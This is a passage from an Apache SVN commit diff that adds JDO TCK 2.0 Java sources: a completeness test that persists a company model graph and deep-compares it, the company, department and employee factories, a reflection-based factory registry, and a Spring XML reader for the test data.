db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/mapping/CompletenessTestMap.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,128 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.mapping; + +import java.util.ArrayList; +import java.util.Iterator; +import java.util.List; + +import org.apache.jdo.tck.JDO_Test; +import org.apache.jdo.tck.pc.companyMapWithoutJoin.CompanyFactoryRegistry; +import org.apache.jdo.tck.pc.companyMapWithoutJoin.CompanyModelReader; +import org.apache.jdo.tck.util.BatchTestRunner; +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +//import org.springframework.beans.factory.xml.XmlBeanFactory; + +/** + *<B>Title:</B>Completeness Test Map + *<BR> + *<B>Keywords:</B> mapping + *<BR> + *<B>Assertion ID:</B> A18.[not identified] + *<BR> + *<B>Assertion Description: </B> + */ + +public class CompletenessTestMap extends JDO_Test { + + /** */ + private static final String ASSERTION_FAILED = + "Assertion A18-[not identified] failed: "; + + /** */ + private final boolean isTestToBePerformed = isTestToBePerformed(); + + /** */ + protected List rootOids; + + /** */ + protected final String inputFilename = System.getProperty("jdo.tck.testdata"); + + /** + * The <code>main</code> is called when the class + * is directly executed from the command line. + * @param args The arguments passed to the program. + */ + public static void main(String[] args) { + BatchTestRunner.run(CompletenessTestMap.class); + } + + /** + * @see JDO_Test#localSetUp() + */ + protected void localSetUp() { + if (isTestToBePerformed) { + getPM(); + CompanyFactoryRegistry.registerFactory(pm); + CompanyModelReader reader = new CompanyModelReader(inputFilename); + addTearDownClass(reader.getTearDownClassesFromFactory()); + // persist test data + pm.currentTransaction().begin(); + List rootList = reader.getRootList(); + pm.makePersistentAll(rootList); + rootOids = new ArrayList(); + for (Iterator i = rootList.iterator(); i.hasNext(); ) { + Object pc = i.next(); + rootOids.add(pm.getObjectId(pc)); + } + pm.currentTransaction().commit(); + cleanupPM(); + } + } + + /** */ + public void test() { + if (isTestToBePerformed) { + // register the default factory + CompanyFactoryRegistry.registerFactory(); + // get new obj graph to compare persistent graph with + CompanyModelReader reader = new CompanyModelReader(inputFilename); + List rootList = reader.getRootList(); + + getPM(); + pm.currentTransaction().begin(); + // compare persisted and new + int size = rootList.size(); + StringBuffer msg = new StringBuffer(); + for (int i = 0; i < size; i++) { + DeepEquality expected = (DeepEquality) rootList.get(i); + Object oid = rootOids.get(i); + Object persisted = pm.getObjectById(oid); + EqualityHelper equalityHelper = new EqualityHelper(); + if (!expected.deepCompareFields(persisted, equalityHelper)) { + if (msg.length() > 0) { + msg.append("\n"); + } + msg.append("Expected this instance:\n " + + expected + "\n" + + "Got persistent instance:" + "\n " + + persisted + "\n" + + "Detailed list of differences follows...\n"); + msg.append(equalityHelper.getUnequalBuffer()); + } + } + pm.currentTransaction().commit(); + // fail test if at least one of the instances is not the expected one + if (msg.length() > 0) { + fail("CompletenessTestMap failed; see list of failures below:", + msg.toString()); + } + } + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/Company.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,331 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.io.Serializable; +import java.io.ObjectInputStream; +import java.io.IOException; + +import java.text.SimpleDateFormat; + +import java.util.Collections; +import java.util.Comparator; +import java.util.Set; +import java.util.HashSet; +import java.util.Date; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents information about a company. + */ +public class Company + implements ICompany, Serializable, Comparable, Comparator, DeepEquality { + + private long companyid; + private String name; + private Date founded; + private transient Set departments = new HashSet(); // element type is Department + + protected static SimpleDateFormat formatter = + new SimpleDateFormat("d/MMM/yyyy"); + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public Company() {} + + /** + * Initialize the <code>Company</code> instance. + * @param companyid The company id. + * @param name The company name. + * @param founded The date the company was founded. + */ + public Company(long companyid, String name, Date founded) { + this.companyid = companyid; + this.name = name; + this.founded = founded; + } + + /** + * Get the company id. + * @return The company id. + */ + public long getCompanyid() { + return companyid; + } + + /** + * Set the id associated with this object. + * @param id the id. + */ + public void setCompanyid(long id) { + if (this.companyid != 0) + throw new IllegalStateException("Id is already set."); + this.companyid = id; + } + + /** + * Get the name of the company. + * @return The name of the company. + */ + public String getName() { + return name; + } + + /** + * Set the name of the company. + * @param name The value to use for the name of the company. + */ + public void setName(String name) { + this.name = name; + } + + /** + * Get the date that the company was founded. + * @return The date the company was founded. + */ + public Date getFounded() { + return founded; + } + + /** + * Set the date that the company was founded. + * @param founded The date to set that the company was founded. + */ + public void setFounded(Date founded) { + this.founded = founded; + } + + /** + * Get the departments contained in the company. + * @return An unmodifiable <code>Set</code> that contains all the + * <code>Department</code>s of the company. + */ + public Set getDepartments() { + return Collections.unmodifiableSet(departments); + } + + /** + * Add a <code>Department</code> instance to the company. + * @param dept The <code>Department</code> instance to add. + */ + public void addDepartment(Department dept) { + departments.add(dept); + } + + /** + * Remove a <code>Department</code> instance from the company. + * @param dept The <code>Department</code> instance to remove. + */ + public void removeDepartment(Department dept) { + departments.remove(dept); + } + + /** + * Initialize the set of <code>Department</code>s in the company to the + * parameter. + * @param departments The set of <code>Department</code>s for the + * company. + */ + public void setDepartments(Set departments) { + // workaround: create a new HashSet, because fostore does not + // support LinkedHashSet + this.departments = + (departments != null) ? new HashSet(departments) : null; + } + + /** Serialization support: initialize transient fields. */ + private void readObject(ObjectInputStream in) + throws IOException, ClassNotFoundException { + in.defaultReadObject(); + departments = new HashSet(); + } + + /** + * Returns a String representation of a <code>Company</code> object. + * @return a String representation of a <code>Company</code> object. + */ + public String toString() { + return "Company(" + getFieldRepr()+ ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(companyid); + rc.append(", name ").append(name); + rc.append(", founded ").append(formatter.format(founded)); + return rc.toString(); + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the specified Person. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + ICompany otherCompany = (ICompany)other; + String where = "Company<" + companyid + ">"; + return + helper.equals(companyid, otherCompany.getCompanyid(), where + ".companyid") & + helper.equals(name, otherCompany.getName(), where + ".name") & + helper.equals(founded, otherCompany.getFounded(), where + ".founded") & + helper.deepEquals(departments, otherCompany.getDepartments(), where + ".departments"); + } + + /** + * Compares this object with the specified object for order. Returns a + * negative integer, zero, or a positive integer as this object is less + * than, equal to, or greater than the specified object. + * @param o The Object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified object. + * @throws ClassCastException - if the specified object's type prevents + * it from being compared to this Object. + */ + public int compareTo(Object o) { + return compareTo((ICompany)o); + } + + /** + * Compare two instances. This is a method in Comparator. + */ + public int compare(Object o1, Object o2) { + return compare((ICompany)o1, (ICompany)o2); + } + + /** + * Compares this object with the specified Company object for + * order. Returns a negative integer, zero, or a positive integer as + * this object is less than, equal to, or greater than the specified + * object. + * @param other The Company object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified Company + * object. + */ + public int compareTo(ICompany other) { + return compare(this, other); + } + + /** + * Compares its two ICompany arguments for order. Returns a negative + * integer, zero, or a positive integer as the first argument is less + * than, equal to, or greater than the second. + * @param o1 the first ICompany object to be compared. + * @param o2 the second ICompany object to be compared. + * @return a negative integer, zero, or a positive integer as the first + * object is less than, equal to, or greater than the second object. + */ + public static int compare(ICompany o1, ICompany o2) { + return EqualityHelper.compare(o1.getCompanyid(), o2.getCompanyid()); + } + + /** + * Indicates whether some other object is "equal to" this one. + * @param obj the object with which to compare. + * @return <code>true</code> if this object is the same as the obj + * argument; <code>false</code> otherwise. + */ + public boolean equals(Object obj) { + if (obj instanceof ICompany) { + return compareTo((ICompany)obj) == 0; + } + return false; + } + + /** + * Returns a hash code value for the object. + * @return a hash code value for this object. + */ + public int hashCode() { + return (int)companyid; + } + + /** + * The class to be used as the application identifier + * for the <code>Company</code> class. It consists of both the company + * name and the date that the company was founded. + */ + public static class Oid implements Serializable, Comparable { + + /** + * This field is part of the identifier and should match in name + * and type with a field in the <code>Company</code> class. + */ + public long companyid; + + /** The required public no-arg constructor. */ + public Oid() { } + + /** + * Initialize the identifier. + * @param companyid The id of the company. + */ + public Oid(long companyid) { + this.companyid = companyid; + } + + public Oid(String s) { companyid = Long.parseLong(justTheId(s)); } + + public String toString() { return this.getClass().getName() + ": " + companyid;} + + + /** */ + public boolean equals(Object obj) { + if (obj==null || !this.getClass().equals(obj.getClass())) + return false; + Oid o = (Oid) obj; + if (this.companyid != o.companyid) + return false; + return true; + } + + /** */ + public int hashCode() { + return (int)companyid; + } + + protected static String justTheId(String str) { + return str.substring(str.indexOf(':') + 1); + } + + /** */ + public int compareTo(Object obj) { + // may throw ClassCastException which the user must handle + Oid other = (Oid) obj; + if( companyid < other.companyid ) return -1; + if( companyid > other.companyid ) return 1; + return 0; + } + + } + +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactory.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactory.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactory.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactory.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,45 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +/* + * CompanyFactory.java + * + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.math.BigDecimal; + +import java.util.Date; + +/** + * This interface is implemented by a factory class that can create + * Company model instances. The factory instance is registered with + * CompanyFactoryRegistry. + */ +public interface CompanyFactory { + ICompany newCompany(long companyid, String name, Date founded); + IDepartment newDepartment(long deptid, String name); + IDepartment newDepartment(long deptid, + String name, ICompany company); + IFullTimeEmployee newFullTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, String role, double sal); + IPartTimeEmployee newPartTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, String role, double wage); + Class[] getTearDownClasses(); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryAbstractImpl.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryAbstractImpl.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryAbstractImpl.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryAbstractImpl.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,109 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import javax.jdo.PersistenceManager; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; + +/* + * This class provides an implementation of CompanyFactory that sets all + * of the properties of the instance and defines abstract methods to + * construct the instance itself. It is intended to be subclassed by + * classes that implement only the methods to construct the instance. + */ +public abstract class CompanyFactoryAbstractImpl implements CompanyFactory { + + protected PersistenceManager pm; + + /** Logger */ + protected Log logger = + LogFactory.getFactory().getInstance("org.apache.jdo.tck"); + + /** true if debug logging is enabled. */ + protected boolean debug = logger.isDebugEnabled(); + + /** Creates a new instance of CompanyFactoryAbstractImpl */ + public CompanyFactoryAbstractImpl(PersistenceManager pm) { + this.pm = pm; + } + + abstract ICompany newCompany(); + abstract IDepartment newDepartment(); + abstract IFullTimeEmployee newFullTimeEmployee(); + abstract IPartTimeEmployee newPartTimeEmployee(); + + public ICompany newCompany(long companyid, String name, + java.util.Date founded) { + ICompany result = newCompany(); + if (debug) logger.debug("newCompany returned" + result); + result.setCompanyid(companyid); + result.setName(name); + result.setFounded(founded); + return result; + } + + public IDepartment newDepartment(long deptid, String name) { + IDepartment result = newDepartment(); + if (debug) logger.debug("newDepartment returned" + result); + result.setDeptid(deptid); + result.setName(name); + return result; + } + + + public IDepartment newDepartment(long deptid, String name, ICompany company) { + IDepartment result = newDepartment(); + if (debug) logger.debug("newDepartment returned" + result); + result.setDeptid(deptid); + result.setName(name); + result.setCompany(company); + return result; + } + + public IFullTimeEmployee newFullTimeEmployee(long personid, String first, + String last, String middle, java.util.Date born, + java.util.Date hired, String role, double sal) { + IFullTimeEmployee result = newFullTimeEmployee(); + if (debug) logger.debug("newFullTimeEmployee returned" + result); + result.setPersonid(personid); + result.setFirstname(first); + result.setLastname(last); + result.setMiddlename(middle); + result.setBirthdate(born); + result.setHiredate(hired); + result.setSalary(sal); + return result; + } + + public IPartTimeEmployee newPartTimeEmployee(long personid, String first, + String last, String middle, java.util.Date born, + java.util.Date hired, String role, double wage) { + IPartTimeEmployee result = newPartTimeEmployee(); + if (debug) logger.debug("newPartTimeEmployee returned" + result); + result.setPersonid(personid); + result.setFirstname(first); + result.setLastname(last); + result.setMiddlename(middle); + result.setBirthdate(born); + result.setHiredate(hired); + result.setWage(wage); + return result; + } + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryConcreteClass.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryConcreteClass.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryConcreteClass.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryConcreteClass.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,81 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.math.BigDecimal; + +import java.util.Date; + +import javax.jdo.PersistenceManager; + +/* + * This class is the company factory that uses constructors of the + * concrete classes. + */ +public class CompanyFactoryConcreteClass implements CompanyFactory { + + /** */ + public static final Class[] tearDownClasses = new Class[] { + PartTimeEmployee.class, FullTimeEmployee.class, + Department.class, Company.class + }; + + public CompanyFactoryConcreteClass(PersistenceManager pm) { + } + + public CompanyFactoryConcreteClass() { + } + + public ICompany newCompany(long companyid, + String name, Date founded) { + return new Company(companyid, name, founded); + } + + public IDepartment newDepartment(long deptid, String name) { + return new Department(deptid, name); + } + + public IDepartment newDepartment(long deptid, + String name, ICompany company) { + return new Department(deptid, name, company); + } + + public IFullTimeEmployee newFullTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, String role, double sal) { + return new FullTimeEmployee(personid, first, last, middle, + born, hired, role, sal); + } + + public IPartTimeEmployee newPartTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, String role, double wage) { + return new PartTimeEmployee(personid, first, last, middle, + born, hired, role, wage); + } + + public IPerson newPerson(long personid, + String firstname, String lastname, String middlename, + Date birthdate) { + return new Person(personid, firstname, lastname, middlename, + birthdate); + } + + public Class[] getTearDownClasses() { + return tearDownClasses; + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMClass.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMClass.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMClass.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMClass.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,62 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import javax.jdo.PersistenceManager; + +/* + * CompanyFactoryPMInterface.java + * + * This class uses the PersistenceManager.newInstance method with the concrete + * class as a parameter. + */ +public class CompanyFactoryPMClass + extends CompanyFactoryAbstractImpl { + + /** */ + public static final Class[] tearDownClasses = new Class[] { + PartTimeEmployee.class, FullTimeEmployee.class, + Department.class, Company.class + }; + + /** + * Creates a new instance of CompanyFactoryPMClass + */ + public CompanyFactoryPMClass(PersistenceManager pm) { + super(pm); + } + + ICompany newCompany() { + return (ICompany)pm.newInstance(Company.class); + } + + IDepartment newDepartment() { + return (IDepartment)pm.newInstance(Department.class); + } + + IFullTimeEmployee newFullTimeEmployee() { + return (IFullTimeEmployee)pm.newInstance(FullTimeEmployee.class); + } + + IPartTimeEmployee newPartTimeEmployee() { + return (IPartTimeEmployee)pm.newInstance(PartTimeEmployee.class); + } + + public Class[] getTearDownClasses() { + return tearDownClasses; + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMInterface.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMInterface.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMInterface.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryPMInterface.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,62 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import javax.jdo.PersistenceManager; + +/* + * CompanyFactoryPMInterface.java + * + * Created on August 29, 2005, 9:56 PM + * + */ +public class CompanyFactoryPMInterface + extends CompanyFactoryAbstractImpl { + + /** */ + public static final Class[] tearDownClasses = new Class[] { + IPartTimeEmployee.class, IFullTimeEmployee.class, + IDepartment.class, ICompany.class + }; + + /** + * Creates a new instance of CompanyFactoryPMInterface + */ + public CompanyFactoryPMInterface(PersistenceManager pm) { + super(pm); + } + + ICompany newCompany() { + return (ICompany)pm.newInstance(ICompany.class); + } + + IDepartment newDepartment() { + return (IDepartment)pm.newInstance(IDepartment.class); + } + + IFullTimeEmployee newFullTimeEmployee() { + return (IFullTimeEmployee)pm.newInstance(IFullTimeEmployee.class); + } + + IPartTimeEmployee newPartTimeEmployee() { + return (IPartTimeEmployee)pm.newInstance(IPartTimeEmployee.class); + } + + public Class[] getTearDownClasses() { + return tearDownClasses; + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryRegistry.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryRegistry.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryRegistry.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyFactoryRegistry.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,139 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.lang.reflect.Constructor; + +import java.math.BigDecimal; + +import java.util.Date; + +import javax.jdo.PersistenceManager; + +/* + * This is the registry for company factories. It is used for the + * CompletenessTest to create instances from input xml test data files. + * Factory instances that implement CompanyFactory interface are + * registered (using the singleton pattern). + * <P>Several registration methods are available. The default factory, + * which creates instances by construction, is automatically + * registered during class initialization. The default factory can + * also be registered by using the no-args method registerFactory(). + * <P>Non-default factories can be registered using the registerFactory + * method taking the factory as an argument. Non-default factories that + * have a single constructor argument PersistenceManager can be + * registered using either the method that explicitly names the class, + * or with the method that takes the class name from a system property. + */ +public class CompanyFactoryRegistry { + + /** The system property for factory name + */ + final static String FACTORY_PROPERTY_NAME = + "jdo.tck.mapping.companyfactory"; + + /** The factory name if the system property is not set. + */ + final static String DEFAULT_FACTORY_CLASS_NAME = + "org.apache.jdo.tck.pc.company.CompanyFactoryConcreteClass"; + + /** + * The default factory class name + */ + final static String FACTORY_CLASS_NAME; + + static { + String prop = System.getProperty(FACTORY_PROPERTY_NAME); + if ((prop == null) || (prop.length() == 0)) + prop = DEFAULT_FACTORY_CLASS_NAME; + FACTORY_CLASS_NAME = prop; + } + + /** + * This is the default company factory singleton. This is statically + * loaded regardless of the setting of the system property. + */ + final static CompanyFactory SINGLETON = new CompanyFactoryConcreteClass(); + + /** + * This is the currently registered factory. + */ + static CompanyFactory instance = SINGLETON; + + /** + * Creates a new instance of CompanyFactoryRegistry + */ + private CompanyFactoryRegistry() { + } + + /** + * Get the currently registered factory. + * @return the factory + */ + public static CompanyFactory getInstance() { + return instance; + } + + /** Register the default factory. + */ + public static void registerFactory() { + instance = SINGLETON; + } + + /** Register a factory using the default factory name from the + * system property. The factory must be available in the current + * class path and have a public constructor + * taking a PersistenceManager as a parameter. + * @param pm the PersistenceManager + */ + public static void registerFactory(PersistenceManager pm) { + registerFactory(FACTORY_CLASS_NAME, pm); + } + + /** Register a factory using the specified factoryName + * parameter. The factory class must be loadable by the current context + * classloader and have a public constructor + * taking a PersistenceManager as a parameter. + * @param factoryClassName the fully-qualified class name of the factory + * @param pm the PersistenceManager + */ + public static void registerFactory(String factoryClassName, + PersistenceManager pm) { + CompanyFactory factory = null; + try { + if (factoryClassName != null) { + Class factoryClass = Class.forName(factoryClassName); + Constructor ctor = factoryClass.getConstructor(new Class[] + {PersistenceManager.class}); + factory = (CompanyFactory) + ctor.newInstance(new Object[]{pm}); + } + registerFactory(factory); + } catch (Exception ex) { + throw new RuntimeException ("Unable to construct CompanyFactory " + + factoryClassName, ex); + } + } + + /** Register the factory. + * @param factory the factory + */ + public static void registerFactory(CompanyFactory factory) { + instance = factory!=null?factory:SINGLETON; + } + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyModelReader.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyModelReader.java?view=auto&rev=441641 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyModelReader.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyMapWithoutJoin/CompanyModelReader.java Fri Sep 8 13:37:08 2006 @@ -0,0 +1,196 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyMapWithoutJoin; + +import java.io.InputStream; +import java.text.SimpleDateFormat; +import java.util.Date; +import java.util.List; +import java.util.Locale; +import java.util.TimeZone; + +import org.apache.jdo.tck.util.ConversionHelper; +import org.springframework.beans.factory.xml.XmlBeanFactory; +import org.springframework.beans.propertyeditors.CustomDateEditor; +import org.springframework.core.io.ClassPathResource; +import org.springframework.core.io.InputStreamResource; + +/** + * Utility class to create a graph of company model instances from an xml + * representation. + * + * @author Michael Bouschen + */ +public class CompanyModelReader extends XmlBeanFactory { + + /** The format of date values in the xml representation */ + public static final String DATE_PATTERN = "d/MMM/yyyy"; + + /** The name of the root list bean. */ + public static final String ROOT_LIST_NAME = "root"; + + /** The bean-factory name in the xml input files. + */ + public static final String BEAN_FACTORY_NAME = "companyFactory"; + + /** The company factory instance. */ + private CompanyFactory companyFactory; + + /** + * Create a CompanyModelReader for the specified resourceName. + * @param resourceName the name of the resource + */ + public CompanyModelReader(String resourceName) { + // Use the class loader of the Company class to find the resource + this(resourceName, Company.class.getClassLoader()); + } + + /** + * Create a CompanyModelReader for the specified resourceName. + * @param resourceName the name of the resource + */ + public CompanyModelReader(String resourceName, ClassLoader classLoader) { + super(new ClassPathResource(resourceName, classLoader)); + configureFactory(); + } + + /** + * Create a CompanyModelReader for the specified InputStream. + * @param stream the input stream + */ + public CompanyModelReader(InputStream stream) { + super(new InputStreamResource(stream)); + configureFactory(); + } + + /** + * Returns a list of root objects. The method expects to find a bean + * called "root" of type list in the xml and returns it. + * @return a list of root instances + */ + public List getRootList() { + return (List)getBean(ROOT_LIST_NAME); + } + + /** + * Configure the CompanyModelReader, e.g. register CustomEditor classes + * to convert the string representation of a property into an instance + * of the right type. + */ + private void configureFactory() { + SimpleDateFormat formatter = new SimpleDateFormat(DATE_PATTERN, Locale.US); + formatter.setTimeZone(TimeZone.getTimeZone("America/New_York")); + CustomDateEditor dateEditor = + new CustomDateEditor(formatter, true); + registerCustomEditor(Date.class, dateEditor); + companyFactory = CompanyFactoryRegistry.getInstance(); + addSingleton(BEAN_FACTORY_NAME, companyFactory); + } + + // Convenience methods + + /** + * Convenience method returning a Company instance for the specified + * name. The method returns <code>null</code> if there is no Company + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Company bean. + */ + public Company getCompany(String name) { + return (Company)getBean(name, Company.class); + } + + /** + * Convenience method returning a Department instance for the specified + * name. The method returns <code>null</code> if there is no Department + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Department bean. + */ + public Department 